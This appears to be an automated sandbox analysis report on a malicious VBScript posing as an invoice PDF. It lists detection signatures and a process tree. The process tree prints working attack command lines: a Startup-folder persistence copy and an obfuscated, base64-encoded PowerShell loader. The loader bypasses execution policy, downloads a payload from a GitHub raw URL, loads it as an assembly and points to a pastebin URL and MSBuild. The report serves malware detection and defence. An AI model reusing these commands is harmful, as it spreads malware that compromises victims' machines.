Windows
Analysis Report
FAKTURA-pdf-466366332.vbs
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4648, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 6264, cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5880, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 3688, cmdline: ping 127.0.0.1 -n 10, MD5: 2F46799D79D22AC72C241EC0322B011D)
- powershell.exe (PID: 5944, cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')'), MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 4832, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk='; $OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7008, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4844, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |